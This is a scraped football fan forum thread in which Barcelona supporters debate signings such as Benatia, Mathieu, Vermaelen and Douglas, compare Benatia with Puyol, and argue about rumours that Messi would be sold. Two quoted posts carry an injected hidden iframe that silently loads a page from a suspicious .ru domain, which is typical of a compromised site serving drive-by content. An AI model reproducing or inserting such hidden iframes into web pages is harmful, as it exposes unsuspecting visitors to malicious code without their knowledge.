Mehdi Benatia

Bertus

you need players that fit the team and have the right quality. for example mathieu. would you want us to sign mandzukic for example? no because he is totally unsuited to our team.

there is no ''barca defense force'' and nobody wants to sign douglas.

What I mean is that Benatia is as good or better than mathieu or Verminator on any skills. Yet some people dare saying Verminator for example does fit barcelona, but Benatia doesn't.

Sorry to point that it's 100% wrong.

R

Ryu Hayabusa

Not at all. And even if they were, he's not Puyol quality, thus he is not a good fit for the quality or lack thereof he bringe.

Yes, because Puyol thoughout his career has been the best CB there ever was and ever will be. :D

Cule4life

The Culest
My friend who is a Man U fan, A MAN U fan laughed at me a few days ago saying "Really Douglas? And i thought woodward was the undisputed Justin Bieber of football...."

F

Frejsgodes

I can compare him to TS since I watched them both playing last year every times I could.

What's nonsense are people like you saying he doesn't fit Barcelona but are not capable in any way to properly explain why.

Sorry but your excuse that he doesn't fit barcelona is a joke.

I dont need to make a serious reply to someone that spews nonsense.

Quit bellyachin. The perhaps people will respond to you in a proper way.

DonAK

President of FC Barcelona
you need players that fit the team and have the right quality. for example mathieu. would you want us to sign mandzukic for example? no because he is totally unsuited to our team.

Thats the point he is making. People saying Benatia wasn't signed because he doesn't fit our style which is rubbish. Ive watched him play a lot and he would definitely slot in well at Barcelona IMHO.

We didn't sign him because he wouldnt fit in. We didn't sign him because our priorities were somewhere else. We went for depth(Verm) to sign Cuadrado after we failed to sign potential quality + a defender for a decade (Marquinhos).

JamDav1982

You've missed some texts and tv shows from the catalan press, then. Some claim the "divorce" was set to happen, before the renewal was agreed upon. And of course it could be only rumors, but they were too frequent for my liking. Plus some of Messi's statements, and also the rumors of Tito convincing him before dying and such stuff.

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

This press and these tv shows come out with lies dailly to sell papers.

No need to pay them more attention when something as absurd as selling Messi to pay for a stadium comes up.

Messi rumours and Titos conversation were both to do with Messi being unhappy due to wages and murmurs from fans about his performances. Had Messi got sold because he was unhappy and wanted to leave that is one thing but its not the same as selling a happy Messi to fund a stadium.

messi2140

6racies Xavi
Jamdav I got to ask you something , is the barca board paying you ? You managed to justify everything the board did. They aren't doing anything wrong by your book. Im not going to constantly bash the board neither am I going to praise every single thing they are doing. The arrival of Mathieu was a fantastic one , but vermaelen and maybe douglas ? Oh praise the almighty board for such a steal.
You forgot Jamdav the defense force President

Guess I'm not the only one

Last edited:

Sid90

you need players that fit the team and have the right quality. for example mathieu. would you want us to sign mandzukic for example? no because he is totally unsuited to our team. would you sign douglas? no because he is shit. you need both to make a good signing. eg rakitic, suarez, mathieu, ter stegen (pretty much all of our signings). the only debatable ones were TV and bravo but they have a chance to prove themselves.

If douggy boy is sh*t he will not play for Barca and if he is alright then he will be a back up for montoya and Alves. Case closed.

Icarium

Lifestealer
The only reason we did not go for benatia is we thought we could sign Marquinhos. Marquinhos+Mathieu was the plan but we all know how that ended.

I

instinct

You've missed some texts and tv shows from the catalan press, then. Some claim the "divorce" was set to happen, before the renewal was agreed upon. And of course it could be only rumors, but they were too frequent for my liking. Plus some of Messi's statements, and also the rumors of Tito convincing him before dying and such stuff.

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Please don't sell it as a fact that the board nearly sold Messi, there were just rumours.
Messi's statements? Which statements? He was asked about leaving, what was he supposed to answer?
The story with Tito? Who leaked the info to the press?
Why was his contract renewed when the board wanted to sell him?

It'd be suicidal for the board to sell Messi. No way this will happen. Now give me my free entry to the ''I told you so'' Hall of Fame

F

Frejsgodes

What Benatia are good at, is similiar to what Puyol was good at (no nonsense defending, airial ability, leadership etc). How good they are compared to eachother is debatable.

No, it's not even a contest. Puyol was far better than Benatia is and even will be. Puyol brought so much, and the things he lacked he made up for in other areas. Benatia can't be compared to him, because the things he lacks in his game, he isn't able to compensate for like Puyol could.

Hamzah

High Definition Member
bertus the main point i'm trying to make is that ok we didn't get him, but what we did get isn't bad at all, but actually good. mathieu and verm fit nicely and for sure mathieu has the quality, verm fits in nicely in terms of style and he has the chance to compete and maybe even win a starting place. either way even if he is a bench player he is very good quality for a backup and at a good price.

Home of Barca Fans